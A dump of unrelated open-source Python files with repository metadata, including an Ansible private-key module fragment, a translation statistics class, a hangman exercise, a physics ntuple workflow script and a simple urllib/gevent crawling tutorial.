return self.passphrase is None else: return cryptography.hazmat.primitives.serialization.load_pem_private_key( self.existing_private_key_bytes, None if self.passphrase is None else to_bytes(self.passphrase), backend=self.cryptography_backend ) except Exception as dummy: return False def _check_size_and_type(self): if isinstance(self.existing_private_key, cryptography.hazmat.primitives.asymmetric.rsa.RSAPrivateKey): return self.type == 'RSA' and self.size == self.existing_private_key.key_size if isinstance(self.existing_private_key, cryptography.hazmat.primitives.asymmetric.dsa.DSAPrivateKey): return self.type == 'DSA' and self.size == self.existing_private_key.key_size if CRYPTOGRAPHY_HAS_X25519 and isinstance(self.existing_private_key, cryptography.hazmat.primitives.asymmetric.x25519.X25519PrivateKey): return self.type == 'X25519' if CRYPTOGRAPHY_HAS_X448 and isinstance(self.existing_private_key, cryptography.hazmat.primitives.asymmetric.x448.X448PrivateKey): return self.type == 'X448' if CRYPTOGRAPHY_HAS_ED25519 and isinstance(self.existing_private_key, cryptography.hazmat.primitives.asymmetric.ed25519.Ed25519PrivateKey): return self.type == 'Ed25519' if CRYPTOGRAPHY_HAS_ED448 and isinstance(self.existing_private_key, cryptography.hazmat.primitives.asymmetric.ed448.Ed448PrivateKey): return self.type == 'Ed448' if isinstance(self.existing_private_key, cryptography.hazmat.primitives.asymmetric.ec.EllipticCurvePrivateKey): if self.type != 'ECC': return False if self.curve not in self.curves: return False return self.curves[self.curve]['verify'](self.existing_private_key) return False def _check_format(self): if self.format == 'auto_ignore': return True try: format = identify_private_key_format(self.existing_private_key_bytes) return format == self._get_wanted_format() except Exception as dummy: return False def select_backend(module, backend): if backend == 'auto': # Detection what is possible can_use_cryptography = CRYPTOGRAPHY_FOUND and CRYPTOGRAPHY_VERSION >= LooseVersion(MINIMAL_CRYPTOGRAPHY_VERSION) can_use_pyopenssl = PYOPENSSL_FOUND and PYOPENSSL_VERSION >= LooseVersion(MINIMAL_PYOPENSSL_VERSION) # Decision if module.params['cipher'] and module.params['passphrase'] and module.params['cipher'] != 'auto': # First try pyOpenSSL, then cryptography if can_use_pyopenssl: backend = 'pyopenssl' elif can_use_cryptography: backend = 'cryptography' else: # First try cryptography, then pyOpenSSL if can_use_cryptography: backend = 'cryptography' elif can_use_pyopenssl: backend = 'pyopenssl' # Success? if backend == 'auto': module.fail_json(msg=("Can't detect any of the required Python libraries " "cryptography (>= {0}) or PyOpenSSL (>= {1})").format( MINIMAL_CRYPTOGRAPHY_VERSION, MINIMAL_PYOPENSSL_VERSION)) if backend == 'pyopenssl': if not PYOPENSSL_FOUND: module.fail_json(msg=missing_required_lib('pyOpenSSL >= {0}'.format(MINIMAL_PYOPENSSL_VERSION)), exception=PYOPENSSL_IMP_ERR) module.deprecate('The module is using the PyOpenSSL backend. 
This backend has been deprecated', version='2.0.0', collection_name='community.crypto') return backend, PrivateKeyPyOpenSSLBackend(module) elif backend == 'cryptography': if not CRYPTOGRAPHY_FOUND: module.fail_json(msg=missing_required_lib('cryptography >= {0}'.format(MINIMAL_CRYPTOGRAPHY_VERSION)), exception=CRYPTOGRAPHY_IMP_ERR) return backend, PrivateKeyCryptographyBackend(module) else: raise Exception('Unsupported value for backend: {0}'.format(backend)) def get_privatekey_argument_spec(): return ArgumentSpec( argument_spec=dict( size=dict(type='int', default=4096), type=dict(type='str', default='RSA', choices=[ 'DSA', 'ECC', 'Ed25519', 'Ed448', 'RSA', 'X25519', 'X448' ]), curve=dict(type='str', choices=[ 'secp224r1', 'secp256k1', 'secp256r1', 'secp384r1', 'secp521r1', 'secp192r1', 'brainpoolP256r1', 'brainpoolP384r1', 'brainpoolP512r1', 'sect163k1', 'sect163r2', 'sect233k1', 'sect233r1', 'sect283k1', 'sect283r1', 'sect409k1', 'sect409r1', 'sect571k1', 'sect571r1', ]), passphrase=dict(type='str', no_log=True), cipher=dict(type='str'), format=dict(type='str', default='auto_ignore', choices=['pkcs1', 'pkcs8', 'raw', 'auto', 'auto_ignore']), format_mismatch=dict(type='str', default='regenerate', choices=['regenerate', 'convert']), select_crypto_backend=dict(type='str', choices=['auto', 'pyopenssl', 'cryptography'], default='auto'), regenerate=dict( type='str', default='full_idempotence', choices=['never', 'fail', 'partial_idempotence', 'full_idempotence', 'always'] ), ), required_together=[ ['cipher', 'passphrase'] ], required_if=[ ['type', 'ECC', ['curve']], ], )
1.164063
1
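A note on the cryptography-backend record above: generate_private_key() and get_private_key_data() boil down to a couple of standard cryptography-library calls. Below is a minimal standalone sketch of that generate-and-serialize path (RSA with the fixed exponent 65537, unencrypted PKCS#8 PEM); the 2048-bit size and the variable names are illustrative, not taken from the module.

from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric import rsa

# Generate an RSA key the same way the backend does (OpenSSL's fixed exponent 65537).
key = rsa.generate_private_key(public_exponent=65537, key_size=2048,
                               backend=default_backend())

# Serialize as unencrypted PKCS#8 PEM, mirroring get_private_key_data() for format='pkcs8'.
pem = key.private_bytes(
    encoding=serialization.Encoding.PEM,
    format=serialization.PrivateFormat.PKCS8,
    encryption_algorithm=serialization.NoEncryption(),
)
print(pem.decode('utf-8').splitlines()[0])  # -----BEGIN PRIVATE KEY-----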
vendor/packages/translate-toolkit/translate/storage/statistics.py
DESHRAJ/fjord
0
12761387
#!/usr/bin/env python # -*- coding: utf-8 -*- # # Copyright 2007 Zuza Software Foundation # # This file is part of translate. # # translate is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # translate is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, see <http://www.gnu.org/licenses/>. """Module to provide statistics and related functionality. """ from translate import lang from translate.lang import factory # calling classifyunits() in the constructor is probably not ideal. # idea: have a property for .classification that calls it if necessary # If we add units or change translations, statistics are out of date # Compare with modules/Status.py in pootling that uses a bitmask to # filter units # Add support for reading and writing Pootle style .stats files # Consider providing quickstats class Statistics(object): """Manages statistics for storage objects.""" def __init__(self, sourcelanguage='en', targetlanguage='en', checkerstyle=None): self.sourcelanguage = sourcelanguage self.targetlanguage = targetlanguage self.language = lang.factory.getlanguage(self.sourcelanguage) # self.init_checker(checkerstyle) self.classification = {} def init_checker(self, checkerstyle=None): from translate.filters import checks from translate.filters import pofilter checkerclasses = [checkerstyle or checks.StandardChecker, pofilter.StandardPOChecker] self.checker = pofilter.POTeeChecker(checkerclasses=checkerclasses) def fuzzy_units(self): """Return a list of fuzzy units.""" if not self.classification: self.classifyunits() units = self.getunits() return [units[item] for item in self.classification["fuzzy"]] def fuzzy_unitcount(self): """Returns the number of fuzzy units.""" return len(self.fuzzy_units()) def translated_units(self): """Return a list of translated units.""" if not self.classification: self.classifyunits() units = self.getunits() return [units[item] for item in self.classification["translated"]] def translated_unitcount(self): """Returns the number of translated units.""" return len(self.translated_units()) def untranslated_units(self): """Return a list of untranslated units.""" if not self.classification: self.classifyunits() units = self.getunits() return [units[item] for item in self.classification["blank"]] def untranslated_unitcount(self): """Returns the number of untranslated units.""" return len(self.untranslated_units()) def getunits(self): """Returns a list of all units in this object.""" return [] def get_source_text(self, units): """Joins the unit source strings in a single string of text.""" source_text = "" for unit in units: source_text += unit.source + "\n" plurals = getattr(unit.source, "strings", []) if plurals: source_text += "\n".join(plurals[1:]) return source_text def wordcount(self, text): """Returns the number of words in the given text.""" return len(self.language.words(text)) def source_wordcount(self): """Returns the number of words in the source text.""" source_text = self.get_source_text(self.getunits()) return self.wordcount(source_text) def translated_wordcount(self): """Returns the number of translated words 
in this object.""" text = self.get_source_text(self.translated_units()) return self.wordcount(text) def untranslated_wordcount(self): """Returns the number of untranslated words in this object.""" text = self.get_source_text(self.untranslated_units()) return self.wordcount(text) def classifyunit(self, unit): """Returns a list of the classes that the unit belongs to. :param unit: the unit to classify """ classes = ["total"] if unit.isfuzzy(): classes.append("fuzzy") if unit.gettargetlen() == 0: classes.append("blank") if unit.istranslated(): classes.append("translated") #TODO: we don't handle checking plurals at all yet, as this is tricky... source = unit.source target = unit.target if isinstance(source, str) and isinstance(target, unicode): source = source.decode(getattr(unit, "encoding", "utf-8")) #TODO: decoding should not be done here # checkresult = self.checker.run_filters(unit, source, target) checkresult = {} for checkname, checkmessage in checkresult.iteritems(): classes.append("check-" + checkname) return classes def classifyunits(self): """Makes a dictionary of which units fall into which classifications. This method iterates over all units. """ self.classification = {} self.classification["fuzzy"] = [] self.classification["blank"] = [] self.classification["translated"] = [] self.classification["has-suggestion"] = [] self.classification["total"] = [] # for checkname in self.checker.getfilters().keys(): # self.classification["check-" + checkname] = [] for item, unit in enumerate(self.unit_iter()): classes = self.classifyunit(unit) # if self.basefile.getsuggestions(item): # classes.append("has-suggestion") for classname in classes: if classname in self.classification: self.classification[classname].append(item) else: self.classification[classname] = item self.countwords() def countwords(self): """Counts the source and target words in each of the units.""" self.sourcewordcounts = [] self.targetwordcounts = [] for unit in self.unit_iter(): self.sourcewordcounts.append([self.wordcount(text) for text in getattr(unit.source, "strings", [""])]) self.targetwordcounts.append([self.wordcount(text) for text in getattr(unit.target, "strings", [""])]) def reclassifyunit(self, item): """Updates the classification of a unit in self.classification. :param item: an integer that is an index in .getunits(). """ unit = self.getunits()[item] self.sourcewordcounts[item] = [self.wordcount(text) for text in unit.source.strings] self.targetwordcounts[item] = [self.wordcount(text) for text in unit.target.strings] classes = self.classifyunit(unit) # if self.basefile.getsuggestions(item): # classes.append("has-suggestion") for classname, matchingitems in self.classification.items(): if (classname in classes) != (item in matchingitems): if classname in classes: self.classification[classname].append(item) else: self.classification[classname].remove(item) self.classification[classname].sort() # self.savestats()
1.789063
2
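A rough usage sketch for the Statistics class above. The toolkit expects subclasses to supply getunits()/unit_iter() and units exposing source, target, isfuzzy(), istranslated() and gettargetlen(); the DummyUnit and ListStatistics classes below are invented for illustration and assume the Python 2 translate-toolkit version shown.

from translate.storage.statistics import Statistics

class DummyUnit(object):
    def __init__(self, source, target, fuzzy=False):
        self.source, self.target, self._fuzzy = source, target, fuzzy
    def isfuzzy(self): return self._fuzzy
    def istranslated(self): return bool(self.target) and not self._fuzzy
    def gettargetlen(self): return len(self.target)

class ListStatistics(Statistics):
    def __init__(self, units):
        self.units = units
        Statistics.__init__(self)
    def getunits(self): return self.units
    def unit_iter(self): return iter(self.units)

stats = ListStatistics([DummyUnit("Hello", "Hallo"),
                        DummyUnit("World", ""),
                        DummyUnit("Cat", "Kat", fuzzy=True)])
stats.classifyunits()
assert stats.translated_unitcount() == 1
assert stats.untranslated_unitcount() == 1
assert stats.fuzzy_unitcount() == 1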
PSet3/MIT_6.00.1x_PSet3_P2_Andrey_Tymofeiuk.py
atymofeiuk/MIT_6.00.1x_Andrey_Tymofeiuk
0
12761515
<gh_stars>0 # -*- coding: utf-8 -*- """ Created on Thu Jun 15 13:58:31 2017 MIT 6.00.1x course on edX.org: PSet3 P2 Next, implement the function getGuessedWord that takes in two parameters - a string, secretWord, and a list of letters, lettersGuessed. This function returns a string that is comprised of letters and underscores, based on what letters in lettersGuessed are in secretWord. This shouldn't be too different from isWordGuessed! @author: <NAME> Important: This code is placed at GitHub to track my progress in programming and to show my way of thinking. Also I will be happy if somebody will find my solution interesting. But I respect The Honor Code and I ask you to respect it also - please don't use this solution to pass the MIT 6.00.1x course. """ def getGuessedWord(secretWord, lettersGuessed): ''' secretWord: string, the word the user is guessing lettersGuessed: list, what letters have been guessed so far returns: string, comprised of letters and underscores that represents what letters in secretWord have been guessed so far. ''' guess = "" for letter in secretWord: if letter in lettersGuessed: guess += letter else: guess += " _" return guess
2.828125
3
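A quick worked example of the function above (the secret word and guesses are arbitrary). Each guessed letter shows up in place and every unguessed letter is rendered as ' _', so guessing 'a' and 'p' against 'apple' gives 'app _ _':

secretWord = 'apple'
lettersGuessed = ['a', 'p']
print(getGuessedWord(secretWord, lettersGuessed))  # prints: app _ _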
gen_colors.py
kewitz/master
3
12761643
<gh_stars>1-10 # -*- coding: utf-8 -*- """ The MIT License (MIT) Copyright (c) 2014 <NAME> Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ import NScheme as ns files = ["./res/L10.msh"] #files = ["./res/L2.msh"] def validateColors(colors): v = True for color in colors: for nodes in color: elements = [e for n in nodes for e in n.elements] cv = len(elements) == len(set(elements)) v = v and cv if not cv: break assert v, "Existem nós com elementos em comum em uma mesma cor." bound = {2: 100.0, 5: 0.0} for f in files: m = ns.Mesh(file=f, verbose=True, debug=True) limit = ns.lib.alloc(len(m.nodes)) colors = m.makeColors(limit, bound, 1) validateColors(colors) dof = len([n for n in m.nodes if n.calc]) nodes_mapped = sum([len(c) for g in colors for c in g]) assert dof == nodes_mapped, "Faltando nós. {} < {}".format(nodes_mapped, dof) print "Done."
1.984375
2
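The validateColors() check above enforces one invariant: inside a single color, no two nodes may touch the same element. Below is a self-contained restatement of that check on plain data; the Node stand-in and the sample element lists are made up, since the real script pulls nodes from an NScheme mesh.

from collections import namedtuple

Node = namedtuple('Node', ['elements'])

def color_is_valid(nodes):
    # Valid when the combined element list has no repeats across the color's nodes.
    elements = [e for n in nodes for e in n.elements]
    return len(elements) == len(set(elements))

good = [Node(elements=[1, 2]), Node(elements=[3, 4])]
bad = [Node(elements=[1, 2]), Node(elements=[2, 3])]  # element 2 is shared
assert color_is_valid(good)
assert not color_is_valid(bad)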
topological_nav/tools/eval_traj_following.py
KH-Kyle/rmp_nav
30
12761771
<reponame>KH-Kyle/rmp_nav import numpy as np import gflags import sys import glob from easydict import EasyDict import os from rmp_nav.neural.common.dataset import DatasetVisualGibson from rmp_nav.common.utils import get_project_root, get_data_dir, get_gibson_asset_dir, get_config_dir from rmp_nav.simulation import agent_factory from topological_nav.reachability import model_factory from topological_nav.tools import eval_envs from topological_nav.tools.eval_traj_following_common import EvaluatorReachability gflags.DEFINE_string('env', 'space8', '') gflags.DEFINE_string('model', 'model_12env_v2_future_pair_proximity_z0228', '') gflags.DEFINE_boolean('dry_run', False, '') gflags.DEFINE_float('sparsify_thres', 0.99, '') gflags.DEFINE_integer('start_idx', 0, '') gflags.DEFINE_integer('n_traj', 100, '') gflags.DEFINE_float('clip_velocity', 0.5, 'Limit the max velocity.') gflags.DEFINE_boolean('visualize', True, '') gflags.DEFINE_boolean('save_screenshot', False, '') gflags.DEFINE_float('zoom', 1.0, '') FLAGS = gflags.FLAGS FLAGS(sys.argv) model = model_factory.get(FLAGS.model)() sparsifier = model['sparsifier'] motion_policy = model['motion_policy'] traj_follower = model['follower'] agent = agent_factory.agents_dict[model['agent']]() e = EvaluatorReachability(dataset=eval_envs.make(FLAGS.env, sparsifier), sparsifier=sparsifier, motion_policy=motion_policy, follower=traj_follower, agent=agent, agent_reverse=None, sparsify_thres=FLAGS.sparsify_thres, clip_velocity=FLAGS.clip_velocity, visualize=FLAGS.visualize, save_screenshot=FLAGS.save_screenshot, zoom=FLAGS.zoom, dry_run=FLAGS.dry_run) e.run(start_idx=FLAGS.start_idx, n_traj=FLAGS.n_traj)
1.515625
2
NNEvol/get_best_nn.py
cvazquezlos/NNEvol-python
1
12761899
<reponame>cvazquezlos/NNEvol-python def get_best_nn(): return None
0.478516
0
com/wy/example/E_Clawer01.py
mygodness100/Python
0
12762027
# Crawl with gevent; Python 3.8 has no matching gevent release yet, so this has to wait from urllib import request # Crawl using gevent, automatically; gevent must be installed import gevent, time from gevent import monkey from http.cookiejar import CookieJar from bs4 import BeautifulSoup monkey.patch_all() # Mark every I/O operation in the current program individually; this is required, because gevent cannot handle the I/O operations inside urllib on its own def f(url): resp = request.urlopen(url) # Open a web page data = resp.read() # Read the whole content of the page print('%d bytes received from %s.' % (len(data), url)) urls = ['https://www.python.org/', 'https://www.yahoo.com/', 'https://github.com/' ] time_start = time.time() for url in urls: # Crawl synchronously f(url) print("synchronous cost", time.time() - time_start) async_time_start = time.time() gevent.joinall([gevent.spawn(f, urls[0]), gevent.spawn(f, urls[1]), gevent.spawn(f, urls[2]), ]) # Crawl asynchronously print("asynchronous cost", time.time() - async_time_start) request.urlretrieve("http URL", "full local path to save the file to") # Download a file directly to local disk # One way to crawl: instead of using request directly, forge a Request object and add some request headers fake1 = request.Request("url") fake1.add_header("User-Agent", "Mozilla/5.0") # Set the browser type resp1 = request.urlopen(fake1) print(resp1.read()) # Another way to crawl: add special handlers # 1. Needs cookies: HTTPCookieProcessor # 2. Needs a proxy for access: ProxyHandler # 3. Needs https encrypted access: HTTPSHandler # 4. Has automatic redirects: HTTPRedirectHandler # specialHandler = request.build_opener(HTTPSHandler()) # request.install_opener(specialHandler) # request.urlopen("url") cookie = CookieJar() fake2 = request.build_opener(request.HTTPCookieProcessor(cookie)) request.install_opener(fake2) resp2 = request.urlopen("url") print(resp2.read()) # BeautifulSoup: parses HTML pages; beautifulsoup4 must be installed, and lxml as well soup = BeautifulSoup("html string", "html.parser: specifies the parser; html means html.parser", "from_encoding=utf8")
1.71875
2
repo/script.module.liveresolver/lib/js2py/pyjs.py
Hades01/Addons
3
12762155
from base import * from constructors.jsmath import Math from constructors.jsdate import Date from constructors.jsobject import Object from constructors.jsfunction import Function from constructors.jsstring import String from constructors.jsnumber import Number from constructors.jsboolean import Boolean from constructors.jsregexp import RegExp from constructors.jsarray import Array from prototypes.jsjson import JSON from host.console import console from host.jseval import Eval from host.jsfunctions import parseFloat, parseInt, isFinite, isNaN # Now we have all the necessary items to create global environment for script __all__ = ['Js', 'PyJsComma', 'PyJsStrictEq', 'PyJsStrictNeq', 'PyJsException', 'PyJsBshift', 'Scope', 'PyExceptionToJs', 'JsToPyException', 'JS_BUILTINS', 'appengine', 'set_global_object', 'JsRegExp', 'PyJsException', 'PyExceptionToJs', 'JsToPyException', 'PyJsSwitchException'] # these were defined in base.py builtins = ('true','false','null','undefined','Infinity', 'NaN', 'console', 'String', 'Number', 'Boolean', 'RegExp', 'Math', 'Date', 'Object', 'Function', 'Array', 'parseFloat', 'parseInt', 'isFinite', 'isNaN') #Array, Function, JSON, Error is done later :) # also some built in functions like eval... def set_global_object(obj): obj.IS_CHILD_SCOPE = False this = This({}) this.own = obj.own this.prototype = obj.prototype PyJs.GlobalObject = this # make this available obj.register('this') obj.put('this', this) scope = dict(zip(builtins, [globals()[e] for e in builtins])) # Now add errors: for name, error in ERRORS.iteritems(): scope[name] = error #add eval scope['eval'] = Eval scope['JSON'] = JSON JS_BUILTINS = {} #k:v for k,v in scope.iteritems() for k,v in scope.iteritems(): JS_BUILTINS[k] = v
1.351563
1
nl2type/nl2type.py
rs-malik/nl2type
1
12762283
import argparse import json from gensim.models import Word2Vec from tensorflow_core.python.keras.models import load_model import convert import extract import predict import vectorize from annotation import annotate def main(input_file: str, output_file: str): extracted_jsdoc = extract.extract_from_file(input_file) df = convert.convert_func_to_df(extracted_jsdoc) word2vec_code = Word2Vec.load('data/word_vecs/word2vec_model_code.bin') word2vec_lang = Word2Vec.load('data/word_vecs/word2vec_model_language.bin') vectors = vectorize.df_to_vec(df, word2vec_lang, word2vec_code) model = load_model('data/model.h5') with open("data/types.json") as f: types_map = json.load(f) predictions = predict.predict(model, vectors, types_map) annotate.annotate(df, predictions, input_file, output_file) if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument("input_file_path", type=str, help="Path of the input file") parser.add_argument("output_file_path", type=str, help="Path of the output file") args = parser.parse_args() main(args.input_file_path, args.output_file_path)
1.773438
2
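The nl2type script above is driven from the command line, but main() can also be called directly to run the extract, convert, vectorize, predict, annotate pipeline. The file names below are placeholders, and the data/ models and dependencies referenced in the module must be available for this to run.

from nl2type import main

# Annotate a JavaScript file with predicted types (both paths are hypothetical).
main('example_input.js', 'example_annotated.js')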
workflows/rdx.py
umd-lhcb/lhcb-ntuples-gen
0
12762411
#!/usr/bin/env python3 # # Author: <NAME> # License: BSD 2-clause # Last Change: Mon Oct 25, 2021 at 09:41 PM +0200 import sys import os import os.path as op from argparse import ArgumentParser, Action from os import chdir from shutil import rmtree from pyBabyMaker.base import TermColor as TC sys.path.insert(0, op.dirname(op.abspath(__file__))) from utils import ( run_cmd_wrapper, append_path, abs_path, ensure_dir, find_all_input, aggregate_fltr, aggregate_output, load_yaml_db, find_year, find_polarity, generate_step2_name, parse_step2_name, workflow_compile_cpp, workflow_cached_ntuple ) ################################# # Command line arguments parser # ################################# def parse_input(): parser = ArgumentParser(description='workflow for R(D(*)).') parser.add_argument('job_name', help='specify job name.') parser.add_argument('-d', '--debug', action='store_true', help='enable debug mode.') return parser.parse_args() ########### # Helpers # ########### rdx_default_fltr = aggregate_fltr( keep=[r'^(Dst|D0).*\.root'], blocked=['__aux']) rdx_default_output_fltrs = { 'ntuple': rdx_default_fltr, 'ntuple_aux': aggregate_fltr(keep=['__aux']), } def rdx_mc_fltr(decay_mode): db = load_yaml_db() # Unfortunately we need to use 'Filename' as the key so we need to re-build # the dict on the fly db = {v['Filename']: v['Keep'] for v in db.values() if 'Keep' in v} if decay_mode not in db: return rdx_default_fltr return aggregate_fltr(keep=[r'^({}).*\.root'.format( '|'.join(db[decay_mode]))]) def rdx_mc_add_info(decay_mode): known_trees = ['D0', 'Dst'] tree_dict = { 'D0': 'TupleBminus/DecayTree', 'Dst': 'TupleB0/DecayTree' } raw_db = load_yaml_db() # Unfortunately we need to use 'Filename' as the key so we need to re-build # the dict on the fly db_keep = {v['Filename']: v['Keep'] for v in raw_db.values() if 'Keep' in v} db_id = {v['Filename']: k for k, v in raw_db.items()} try: decay_id = db_id[decay_mode] except KeyError: decay_id = '0' if decay_mode not in db_keep: return None, decay_id # NOTE: Here we are returning trees to BLOCK!! return [tree_dict[t] for t in known_trees if t not in db_keep[decay_mode]], decay_id ###################### # Workflows: helpers # ###################### def workflow_ubdt(input_ntp, trees=['TupleB0/DecayTree', 'TupleBminus/DecayTree'], **kwargs): weight_file = abs_path('../run2-rdx/weights_run2_no_cut_ubdt.xml') cmd = 'addUBDTBranch {} mu_isMuonTight {} ubdt.root {}'.format( input_ntp, weight_file, ' '.join(trees)) workflow_cached_ntuple(cmd, input_ntp, **kwargs) try: rmtree('./weights') except FileNotFoundError: pass def workflow_hammer(input_ntp, trees=['TupleB0/DecayTree', 'TupleBminus/DecayTree'], **kwargs): run = 'run1' if '2011' in input_ntp or '2012' in input_ntp else 'run2' cmd = ['ReweightRDX '+input_ntp+' hammer.root '+t+' '+run for t in trees] workflow_cached_ntuple( cmd, input_ntp, output_ntp='hammer.root', cache_suffix='__aux_hammer', **kwargs) def workflow_pid(input_ntp, pid_histo_folder, config, **kwargs): pid_histo_folder = abs_path(pid_histo_folder) config = abs_path(config) year = find_year(input_ntp) polarity = find_polarity(input_ntp) # This is in 'scripts' folder! 
cmd = 'apply_histo_weight.py {} {} pid.root -c {} --year {} --polarity {}'.format( input_ntp, pid_histo_folder, config, year, polarity) workflow_cached_ntuple( cmd, input_ntp, output_ntp='pid.root', cache_suffix='__aux_pid', **kwargs) def workflow_data_mc(job_name, inputs, output_dir=abs_path('../gen'), patterns=['*.root'], blocked_patterns=['__aux'], executor=run_cmd_wrapper() ): print('{}==== Job: {} ===={}'.format(TC.BOLD+TC.GREEN, job_name, TC.END)) # Need to figure out the absolute path input_files = find_all_input(inputs, patterns, blocked_patterns) subworkdirs = {op.splitext(op.basename(i))[0]: i for i in input_files} # Now ensure the working dir workdir = ensure_dir(op.join(output_dir, job_name)) return subworkdirs, workdir, executor ############# # Workflows # ############# def workflow_data(job_name, inputs, input_yml, use_ubdt=True, output_ntp_name_gen=generate_step2_name, output_fltr=rdx_default_output_fltrs, cli_vars=None, blocked_input_trees=None, blocked_output_trees=None, directive_override=None, **kwargs): subworkdirs, workdir, executor = workflow_data_mc( job_name, inputs, **kwargs) chdir(workdir) cpp_template = abs_path('../postprocess/cpp_templates/rdx.cpp') if cli_vars: cli_vars = ' '.join([k+':'+v for k, v in cli_vars.items()]) for subdir, input_ntp in subworkdirs.items(): print('{}Working on {}...{}'.format(TC.GREEN, input_ntp, TC.END)) ensure_dir(subdir, make_absolute=False) chdir(subdir) # Switch to the workdir of the subjob if use_ubdt: # Generate a ubdt ntuple workflow_ubdt(input_ntp, executor=executor) bm_cmd = 'babymaker -i {} -o baby.cpp -n {} -t {} -f ubdt.root' else: bm_cmd = 'babymaker -i {} -o baby.cpp -n {} -t {}' if cli_vars: bm_cmd += ' -V '+cli_vars if blocked_input_trees: bm_cmd += ' -B '+' '.join(blocked_input_trees) if blocked_output_trees: bm_cmd += ' -X '+' '.join(blocked_output_trees) if directive_override: bm_cmd += ' -D '+' '.join([k+':'+v for k, v in directive_override.items()]) executor(bm_cmd.format(abs_path(input_yml), input_ntp, cpp_template)) workflow_compile_cpp('baby.cpp', executor=executor) output_suffix = output_ntp_name_gen(input_ntp) executor('./baby.exe --{}'.format(output_suffix)) aggregate_output('..', subdir, output_fltr) chdir('..') # Switch back to parent workdir def workflow_mc(job_name, inputs, input_yml, output_ntp_name_gen=generate_step2_name, pid_histo_folder='../run2-rdx/reweight/pid/root-run2-rdx_oldcut', config='../run2-rdx/reweight/pid/run2-rdx_oldcut.yml', output_fltr=rdx_default_output_fltrs, **kwargs): subworkdirs, workdir, executor = workflow_data_mc( job_name, inputs, **kwargs) chdir(workdir) cpp_template = abs_path('../postprocess/cpp_templates/rdx.cpp') for subdir, input_ntp in subworkdirs.items(): print('{}Working on {}...{}'.format(TC.GREEN, input_ntp, TC.END)) ensure_dir(subdir, make_absolute=False) chdir(subdir) # Switch to the workdir of the subjob output_suffix = output_ntp_name_gen(input_ntp) decay_mode = output_suffix.split('--')[2] blocked_input_trees, decay_id = rdx_mc_add_info(decay_mode) # Generate a HAMMER ntuple workflow_hammer(input_ntp, executor=executor) # Generate PID weights workflow_pid(input_ntp, pid_histo_folder, config, executor=executor) bm_cmd = 'babymaker -i {} -o baby.cpp -n {} -t {} -f hammer.root pid.root' if blocked_input_trees: bm_cmd += ' -B '+' '.join(blocked_input_trees) bm_cmd += ' -V '+'cli_mc_id:'+decay_id executor(bm_cmd.format(abs_path(input_yml), input_ntp, cpp_template)) workflow_compile_cpp('baby.cpp', executor=executor) executor('./baby.exe --{}'.format(output_suffix)) 
aggregate_output('..', subdir, output_fltr) chdir('..') # Switch back to parent workdir ##################### # Production config # ##################### args = parse_input() executor = run_cmd_wrapper(args.debug) JOBS = { # Run 2 'rdx-ntuple-run2-data-oldcut': lambda name: workflow_data( name, '../ntuples/0.9.5-bugfix/Dst_D0-cutflow_data', '../postprocess/rdx-run2/rdx-run2_oldcut.yml', executor=executor ), 'rdx-ntuple-run2-mc-demo': lambda name: workflow_mc( name, '../ntuples/0.9.5-bugfix/Dst_D0-mc/Dst_D0--21_10_08--mc--MC_2016_Beam6500GeV-2016-MagDown-Nu1.6-25ns-Pythia8_Sim09j_Trig0x6139160F_Reco16_Turbo03a_Filtered_11574011_D0TAUNU.SAFESTRIPTRIG.DST.root', '../postprocess/rdx-run2/rdx-run2_oldcut.yml', executor=executor ), # Run 2 debug 'rdx-ntuple-run2-data-oldcut-no-Dst-veto': lambda name: workflow_data( name, [ '../ntuples/0.9.4-trigger_emulation/Dst_D0-std', '../ntuples/0.9.5-bugfix/Dst_D0-cutflow_data', ], '../postprocess/rdx-run2/rdx-run2_oldcut.yml', executor=executor, cli_vars={'cli_no_dst_veto': '100.0'} ), # Run 2 cutflow 'rdx-ntuple-run2-data-oldcut-cutflow': lambda name: workflow_data( name, '../ntuples/0.9.5-bugfix/Dst_D0-cutflow_data', '../postprocess/rdx-run2/rdx-run2_oldcut.yml', executor=executor, cli_vars={'cli_cutflow': 'true'} ), # Run 1 'rdx-ntuple-run1-data': lambda name: workflow_data( name, '../ntuples/0.9.5-bugfix/Dst_D0-std', '../postprocess/rdx-run1/rdx-run1.yml', use_ubdt=False, executor=executor ), # Reference Run 1 'ref-rdx-ntuple-run1-data-Dst': lambda name: workflow_data( name, '../ntuples/ref-rdx-run1/Dst-mix/Dst--21_10_21--mix--all--2011-2012--md-mu--phoebe.root', '../postprocess/ref-rdx-run1/ref-rdx-run1-Dst.yml', use_ubdt=False, output_ntp_name_gen=parse_step2_name, executor=executor, directive_override={'one_cand_only/enable': 'false'} ), 'ref-rdx-ntuple-run1-data-D0': lambda name: workflow_data( name, '../ntuples/ref-rdx-run1/D0-mix/D0--21_10_21--mix--all--2011-2012--md-mu--phoebe.root', '../postprocess/ref-rdx-run1/ref-rdx-run1-D0.yml', use_ubdt=False, output_ntp_name_gen=parse_step2_name, executor=executor, directive_override={'one_cand_only/enable': 'false'} ), } if args.job_name in JOBS: JOBS[args.job_name](args.job_name) else: print('Unknown job name: {}'.format(args.job_name))
1.375
1
app/main/forms.py
CheboiDerrick/flask-blog-app
0
12762539
